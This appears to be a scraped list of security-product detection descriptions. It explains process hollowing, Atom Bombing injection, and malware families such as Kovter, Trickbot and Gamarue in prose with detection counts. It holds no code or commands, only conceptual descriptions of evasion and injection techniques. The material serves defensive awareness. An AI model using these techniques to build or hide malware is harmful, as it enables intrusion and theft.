A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Process hollowing detected - (443)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Atom Bombing code injection technique detected - (389)
A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
Gamarue malware detected - (195)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Dealply adware detected - (186)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Trickbot malware detected - (174)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Installcore adware detected - (116)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Viewing all 1927 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>